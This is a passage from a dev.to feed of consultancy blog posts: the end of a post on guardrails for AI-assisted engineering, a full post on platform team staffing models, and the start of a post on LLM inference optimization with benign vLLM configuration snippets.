  Law 2: The Testing Inverse
&lt;/h2&gt;

&lt;p&gt;AI-generated tests have a blind spot: they test what the AI thinks the code does, not what the code should do from a business perspective.&lt;/p&gt;

&lt;p&gt;We saw this firsthand. Our AI agent generated 200+ unit tests for a billing module. All green. Coverage was 94%. But the tests were tautological — they verified the code did what the code did, not that it correctly calculated invoices according to the pricing model.&lt;/p&gt;

&lt;p&gt;A human-written test caught that annual billing with mid-cycle upgrades was charging the wrong prorated amount. None of the 200 AI tests caught it because the AI had encoded the bug in both the code and the tests.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Guardrail
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Maintain a "canary test suite" written and maintained exclusively by humans.&lt;/strong&gt; These tests encode business logic, edge cases, and invariants that must always hold true. They're the immune system that catches when AI-generated code and AI-generated tests both miss the same thing.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Canary tests — HUMANS ONLY, never AI-generated
&lt;/span&gt;&lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;BillingCanaryTests&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_annual_upgrade_proration&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;self&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Business rule: mid-cycle upgrade prorates from upgrade date,
        not from billing cycle start. Finance confirmed 2026-01-15.&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
        &lt;span class="n"&gt;invoice&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;calculate_upgrade_proration&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;plan_from&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;starter&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;plan_to&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;growth&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;cycle_start&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2026&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="n"&gt;upgrade_date&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nf"&gt;date&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2026&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;15&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="c1"&gt;# 17 days of Growth pricing, not 75 days
&lt;/span&gt;        &lt;span class="k"&gt;assert&lt;/span&gt; &lt;span class="n"&gt;invoice&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;prorated_days&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;17&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The canary suite should be small (50-100 tests), focused on business-critical paths, and reviewed quarterly by product + engineering together.&lt;/p&gt;

&lt;h2&gt;
  
  
  Law 3: The Operations Inverse
&lt;/h2&gt;

&lt;p&gt;This one hit us directly. We run 9 autonomous AI agents managing infrastructure, content, security, and operations. When the AI is working, everything is smooth — containers restart, configs update, incidents get triaged.&lt;/p&gt;

&lt;p&gt;But when our orchestrator went down for 3 hours, the team was lost. Nobody remembered the manual procedure for restarting the Traefik proxy. Nobody knew which containers had health checks and which didn't. The muscle memory was gone because the AI had been handling everything for months.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Guardrail
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Quarterly "AI-off" drills.&lt;/strong&gt; Disable your AI automation and practice manual operations. This is the engineering equivalent of a fire drill.&lt;/p&gt;

&lt;p&gt;Schedule:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Monthly:&lt;/strong&gt; One team member shadows the AI's operations decisions for a day, documenting what they'd do differently&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quarterly:&lt;/strong&gt; Full "AI-off" drill for 2 hours — all AI automation paused, team handles operations manually&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Annually:&lt;/strong&gt; Full incident simulation without AI assistance&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We implemented this after our orchestrator outage. The first drill was rough — MTTR was 4x worse without AI. By the third drill, the team had rebuilt enough manual competency that AI failures became inconveniences, not crises.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Meta-Pattern: AI Amplifies, Doesn't Replace
&lt;/h2&gt;

&lt;p&gt;The inverse laws share a root cause: treating AI as a replacement rather than an amplifier. When AI replaces human understanding, you've traded visible complexity for invisible fragility.&lt;/p&gt;

&lt;p&gt;The correct model:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;AI writes code → humans understand and own it&lt;/li&gt;
&lt;li&gt;AI generates tests → humans maintain the canary suite&lt;/li&gt;
&lt;li&gt;AI handles operations → humans practice without it&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This isn't about slowing down. It's about building resilience at the speed of AI. The teams that get this right will ship 3x faster AND recover from failures in minutes. The teams that don't will ship 3x faster until the first major incident — and then spend weeks recovering.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Implementation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  For Engineering Managers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Add "AI comprehension review" to your PR checklist&lt;/li&gt;
&lt;li&gt;Create a canary test suite with business-critical invariants&lt;/li&gt;
&lt;li&gt;Schedule the first "AI-off" drill this quarter&lt;/li&gt;
&lt;li&gt;Track "AI-generated code incident rate" as a team metric&lt;/li&gt;
&lt;/ol&gt;
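
&lt;p&gt;The last item only works if the metric has a concrete definition. One simple option (the field names here are illustrative, not a standard schema): incidents traced to AI-authored changes, per 100 AI-authored changes merged in the same period.&lt;br&gt;
&lt;/p&gt;

```python
def ai_incident_rate(changes):
    # changes: dicts like {"ai_generated": True, "caused_incident": False},
    # one per merged change in the period (schema is illustrative)
    ai_changes = [c for c in changes if c["ai_generated"]]
    if not ai_changes:
        return 0.0
    incidents = sum(1 for c in ai_changes if c["caused_incident"])
    return 100.0 * incidents / len(ai_changes)
```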

&lt;h3&gt;
  
  
  For CTOs
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Establish AI governance policies before the first inverse-law incident&lt;/li&gt;
&lt;li&gt;Budget for human review time — AI coding speed is meaningless if review becomes the bottleneck&lt;/li&gt;
&lt;li&gt;Ensure your incident response runbooks have manual fallbacks for every AI-automated step&lt;/li&gt;
&lt;li&gt;Consider AI adoption pace relative to team comprehension capacity&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  For Individual Engineers
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;When AI generates code, read it as if a junior engineer wrote it — with skepticism&lt;/li&gt;
&lt;li&gt;Write at least one test per feature that you'd bet your bonus on&lt;/li&gt;
&lt;li&gt;Know how to do your job without AI tools — they will go down&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;Need help building AI guardrails for your engineering team? We run 9 autonomous agents in production and have learned these lessons the hard way. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;AI infrastructure services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>Platform Team Staffing Models: Dedicated vs Embedded vs Hybrid — A Decision Framework</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:45 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/platform-team-staffing-models-dedicated-vs-embedded-vs-hybrid-a-decision-framework-4dh8</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/platform-team-staffing-models-dedicated-vs-embedded-vs-hybrid-a-decision-framework-4dh8</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/platform-team-staffing-dedicated-embedded-hybrid" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  Platform Team Staffing Models: Dedicated vs Embedded vs Hybrid
&lt;/h1&gt;

&lt;p&gt;You hired 6 platform engineers. Four of them are doing ticket work — resetting credentials, debugging CI pipelines, and answering Slack questions about why the staging environment is down again.&lt;/p&gt;

&lt;p&gt;This isn't a people problem. It's a staffing model problem. The way you organize your platform team determines whether they build leverage or become an expensive help desk.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Three Models
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Model 1: Dedicated (Centralized) Platform Team
&lt;/h3&gt;

&lt;p&gt;The entire platform team sits together, owns a shared roadmap, and builds platform capabilities as internal products.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Platform team has its own backlog, sprint cycles, and product manager&lt;/li&gt;
&lt;li&gt;Product teams submit requests through a self-service portal or queue&lt;/li&gt;
&lt;li&gt;Platform engineers don't join product team standups or rituals&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Organizations with 5+ product teams&lt;/li&gt;
&lt;li&gt;Mature platforms with established self-service tooling&lt;/li&gt;
&lt;li&gt;Teams where platform work is clearly separable from product work&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The risk:&lt;/strong&gt; Ivory tower syndrome. The platform team builds what they think is important, not what product teams actually need. You end up with a beautifully engineered internal developer portal that nobody uses because it doesn't solve the real friction points.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; Embed a product manager in the platform team. Their job is to interview product engineers monthly and translate pain points into platform roadmap items.&lt;/p&gt;

&lt;h3&gt;
  
  
  Model 2: Embedded (Distributed) Platform Engineers
&lt;/h3&gt;

&lt;p&gt;Platform engineers are embedded in product teams, attending their standups and working on platform improvements within the product context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each product team gets 0.5-1 platform engineer&lt;/li&gt;
&lt;li&gt;They work on team-specific platform needs (CI/CD, observability, deployment)&lt;/li&gt;
&lt;li&gt;Coordination happens through a "platform guild" — weekly sync, shared standards&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Early-stage platform teams (fewer than 4 platform engineers)&lt;/li&gt;
&lt;li&gt;Organizations where product teams have very different platform needs&lt;/li&gt;
&lt;li&gt;Situations where platform adoption is low and you need missionaries, not builders&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The risk:&lt;/strong&gt; Platform engineers go native. They become the product team's DevOps person, spending 80% of their time on product-specific work and 20% on platform improvements. After 6 months, you have 4 product-team DevOps engineers and no platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; Enforce a 60/40 split — 60% platform work, 40% product-context work. The platform guild lead reviews allocation monthly.&lt;/p&gt;

&lt;h3&gt;
  
  
  Model 3: Hybrid (Core + Liaisons)
&lt;/h3&gt;

&lt;p&gt;A small core team builds and maintains the platform. Each product cluster has a platform liaison who translates between product needs and platform capabilities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Core team (3-5 engineers) owns the platform roadmap and builds shared capabilities&lt;/li&gt;
&lt;li&gt;Liaisons (1 per 2-3 product teams) attend product standups and surface friction&lt;/li&gt;
&lt;li&gt;Liaisons route issues: simple ones they fix themselves, complex ones go to core team backlog&lt;/li&gt;
&lt;li&gt;Monthly "platform review" where liaisons present top friction points to core team&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Best for:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Mid-size organizations (50-200 engineers)&lt;/li&gt;
&lt;li&gt;Organizations transitioning from embedded to dedicated model&lt;/li&gt;
&lt;li&gt;Teams where platform maturity varies across product areas&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The risk:&lt;/strong&gt; Liaisons become bottlenecks. Product teams stop going to self-service and start going to their liaison for everything. The liaison becomes a human API gateway.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation:&lt;/strong&gt; Liaisons must have a "teach, not do" mandate. If a product engineer asks the same question twice, the liaison's job is to build documentation or tooling — not answer the question again.&lt;/p&gt;

&lt;h2&gt;
  
  
  Decision Matrix
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Factor&lt;/th&gt;
&lt;th&gt;Dedicated&lt;/th&gt;
&lt;th&gt;Embedded&lt;/th&gt;
&lt;th&gt;Hybrid&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Team size (platform)&lt;/td&gt;
&lt;td&gt;6+&lt;/td&gt;
&lt;td&gt;2-4&lt;/td&gt;
&lt;td&gt;4-8&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Product teams&lt;/td&gt;
&lt;td&gt;5+&lt;/td&gt;
&lt;td&gt;2-4&lt;/td&gt;
&lt;td&gt;3-6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Platform maturity&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-service adoption&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Growing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Primary risk&lt;/td&gt;
&lt;td&gt;Ivory tower&lt;/td&gt;
&lt;td&gt;Going native&lt;/td&gt;
&lt;td&gt;Liaison bottleneck&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  The Staffing Ratio
&lt;/h2&gt;

&lt;p&gt;Based on industry data and our client work:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Early stage:&lt;/strong&gt; 1 platform engineer per 8-10 product engineers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Growth stage:&lt;/strong&gt; 1 per 10-15 product engineers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Mature stage:&lt;/strong&gt; 1 per 15-25 product engineers (self-service reduces load)&lt;/li&gt;
&lt;/ul&gt;
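
&lt;p&gt;Those bands double as a quick sizing check. The ranges in this sketch are the ones above; aiming at the midpoint of each band is our simplification, not an industry rule.&lt;br&gt;
&lt;/p&gt;

```python
# Ratio bands from the list above: 1 platform engineer per N product engineers
RATIO_BANDS = {
    "early": (8, 10),
    "growth": (10, 15),
    "mature": (15, 25),
}

def platform_headcount(product_engineers, stage):
    low, high = RATIO_BANDS[stage]
    midpoint = (low + high) / 2  # simplification: aim at the middle of the band
    return max(1, round(product_engineers / midpoint))
```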

&lt;p&gt;If you're staffed more heavily than 1:8 (more than one platform engineer per 8 product engineers), you either have extraordinary platform needs or your platform team is doing product work.&lt;/p&gt;

&lt;h2&gt;
  
  
  Real-World Evolution
&lt;/h2&gt;

&lt;p&gt;Most organizations go through this progression:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Phase 1 (0-30 engineers):&lt;/strong&gt; No platform team. Senior engineers do DevOps part-time. This is fine.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase 2 (30-80 engineers):&lt;/strong&gt; First 2-3 platform engineers, embedded in product teams. Focus: CI/CD, deployment, basic observability.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase 3 (80-200 engineers):&lt;/strong&gt; Hybrid model. Core team builds self-service, liaisons drive adoption.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Phase 4 (200+ engineers):&lt;/strong&gt; Dedicated platform team with product management. Self-service is the default.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Skipping phases causes pain. A 40-person company with a dedicated platform team will waste cycles building infrastructure nobody uses. A 200-person company with embedded platform engineers will have inconsistent tooling across every team.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Metric That Tells You If It's Working
&lt;/h2&gt;

&lt;p&gt;Track one number: &lt;strong&gt;percentage of platform requests resolved through self-service.&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Below 30%: Your platform is a help desk. Invest in self-service tooling.&lt;/li&gt;
&lt;li&gt;30-60%: Growing. Focus on documentation and the top 5 repeat requests.&lt;/li&gt;
&lt;li&gt;60-80%: Healthy. Platform team can focus on capabilities, not support.&lt;/li&gt;
&lt;li&gt;Above 80%: Mature. Consider reducing platform headcount or tackling harder problems.&lt;/li&gt;
&lt;/ul&gt;
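
&lt;p&gt;Those bands translate directly into a check you can wire into a dashboard. A sketch; the boundary handling (for example, exactly 80%) is a judgment call the list above leaves open.&lt;br&gt;
&lt;/p&gt;

```python
def self_service_band(pct):
    # Thresholds from the list above; exact boundary values (30, 60, 80)
    # are assigned to the band they close, which the list leaves ambiguous
    if pct > 80:
        return "mature: reduce platform headcount or tackle harder problems"
    if pct >= 60:
        return "healthy: focus on capabilities, not support"
    if pct >= 30:
        return "growing: document the top repeat requests"
    return "help desk: invest in self-service tooling"
```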




&lt;p&gt;Need help designing your platform team structure? We've helped organizations from 20 to 2000 engineers find the right model. &lt;a href="https://techsaas.cloud/contact" rel="noopener noreferrer"&gt;Book a consultation&lt;/a&gt; or explore our &lt;a href="https://techsaas.cloud/services" rel="noopener noreferrer"&gt;platform engineering services&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>tutorial</category>
      <category>programming</category>
      <category>devops</category>
    </item>
    <item>
      <title>LLM Inference Optimization: Batching, Quantization, and Speculative Decoding</title>
      <dc:creator>Yash Pritwani</dc:creator>
      <pubDate>Thu, 07 May 2026 06:00:10 +0000</pubDate>
      <link>https://dev.to/yash_pritwani_07a77613fd6/llm-inference-optimization-batching-quantization-and-speculative-decoding-djp</link>
      <guid>https://dev.to/yash_pritwani_07a77613fd6/llm-inference-optimization-batching-quantization-and-speculative-decoding-djp</guid>
      <description>&lt;p&gt;&lt;em&gt;Originally published on &lt;a href="https://www.techsaas.cloud/blog/llm-inference-optimization-batching-quantization" rel="noopener noreferrer"&gt;TechSaaS Cloud&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;








&lt;h1&gt;
  
  
  LLM Inference Optimization: Cut Costs 80% Without Cutting Quality
&lt;/h1&gt;

&lt;p&gt;If you're serving LLM inference in production, you're probably paying 5-10x more than you need to. The default configurations of most serving frameworks optimize for simplicity, not efficiency.&lt;/p&gt;

&lt;p&gt;Three techniques — continuous batching, quantization, and speculative decoding — can cut your inference costs by 80% and latency by 60%. Here's how each works and when to use them.&lt;/p&gt;

&lt;h2&gt;
  
  
  Technique 1: Continuous Batching
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem with Naive Batching
&lt;/h3&gt;

&lt;p&gt;Traditional batching waits for N requests to arrive, then processes them together. This creates a latency-throughput tradeoff: small batches waste GPU cycles, large batches add waiting time.&lt;/p&gt;

&lt;h3&gt;
  
  
  Continuous Batching (Iteration-Level Scheduling)
&lt;/h3&gt;

&lt;p&gt;Instead of batching at the request level, continuous batching schedules at the token level. New requests can join a running batch between token generations, and completed requests leave immediately.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# vLLM handles this automatically
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;vllm&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;SamplingParams&lt;/span&gt;

&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;meta-llama/Llama-3-70B&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tensor_parallel_size&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;max_num_batched_tokens&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;32768&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Total tokens across all requests in batch
&lt;/span&gt;    &lt;span class="n"&gt;max_num_seqs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;              &lt;span class="c1"&gt;# Max concurrent sequences
&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Impact:&lt;/strong&gt; 3-5x throughput improvement over naive batching. Latency for individual requests stays low because they don't wait for a full batch to form.&lt;/p&gt;

&lt;h3&gt;
  
  
  Benchmarks
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Serving Framework&lt;/th&gt;
&lt;th&gt;Requests/sec (Llama-3-70B)&lt;/th&gt;
&lt;th&gt;P50 Latency&lt;/th&gt;
&lt;th&gt;P99 Latency&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Naive batching&lt;/td&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;2.1s&lt;/td&gt;
&lt;td&gt;8.4s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;vLLM (continuous)&lt;/td&gt;
&lt;td&gt;47&lt;/td&gt;
&lt;td&gt;0.8s&lt;/td&gt;
&lt;td&gt;2.1s&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TGI (continuous)&lt;/td&gt;
&lt;td&gt;41&lt;/td&gt;
&lt;td&gt;0.9s&lt;/td&gt;
&lt;td&gt;2.4s&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Technique 2: Quantization
&lt;/h2&gt;

&lt;p&gt;Quantization reduces the precision of model weights from FP16 (16-bit) to INT8 or INT4, dramatically reducing memory usage and increasing inference speed.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Tradeoff
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Precision&lt;/th&gt;
&lt;th&gt;Memory (70B model)&lt;/th&gt;
&lt;th&gt;Speed vs FP16&lt;/th&gt;
&lt;th&gt;Quality Loss&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;FP16&lt;/td&gt;
&lt;td&gt;140GB&lt;/td&gt;
&lt;td&gt;1x (baseline)&lt;/td&gt;
&lt;td&gt;0%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;INT8 (GPTQ)&lt;/td&gt;
&lt;td&gt;70GB&lt;/td&gt;
&lt;td&gt;1.5-2x&lt;/td&gt;
&lt;td&gt;&amp;lt;1%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;INT4 (AWQ)&lt;/td&gt;
&lt;td&gt;35GB&lt;/td&gt;
&lt;td&gt;2-3x&lt;/td&gt;
&lt;td&gt;1-3%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;INT4 (GGUF)&lt;/td&gt;
&lt;td&gt;35GB&lt;/td&gt;
&lt;td&gt;2-3x&lt;/td&gt;
&lt;td&gt;1-5%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
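
&lt;p&gt;The memory column is plain arithmetic: parameter count times bits per weight. A quick sanity check, counting weights only (the KV cache and activations come on top).&lt;br&gt;
&lt;/p&gt;

```python
def weight_memory_gb(num_params, bits_per_weight):
    # Weights only; KV cache and activation memory are extra
    return num_params * bits_per_weight / 8 / 1e9  # decimal GB, as in the table

# A 70B model: FP16 needs 140 GB, INT8 needs 70 GB, INT4 needs 35 GB
```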

&lt;p&gt;&lt;strong&gt;AWQ (Activation-aware Weight Quantization)&lt;/strong&gt; is our recommendation for production. It preserves quality better than naive INT4 by identifying and protecting salient weight channels.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;vllm&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;LLM&lt;/span&gt;

&lt;span class="c1"&gt;# Serve a 70B model on a single A100 80GB (impossible with FP16)
&lt;/span&gt;&lt;span class="n"&gt;llm&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;LLM&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;model&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TheBloke/Llama-3-70B-AWQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;quantization&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;awq&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;tensor_parallel_size&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;# Single GPU!
&lt;/span&gt;    &lt;span class="n"&gt;gpu_memory_utilization&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;0.9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  When NOT to Quantize
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Code generation models (precision matters for syntax)&lt;/li&gt;
&lt;li&gt;Mathematical reasoning (quantization loses numerical precision)&lt;/li&gt;
&lt;li&gt;Models smaller than 13B (the quality loss is proportionally larger)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Technique 3: Speculative Decoding
&lt;/h2&gt;

&lt;p&gt;The insight: use a small, fast "draft" model to generate candidate tokens, then verify them in parallel with the large model. If the draft model is right (which it often is for common patterns), you get the speed of the small model with the quality of the large one.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
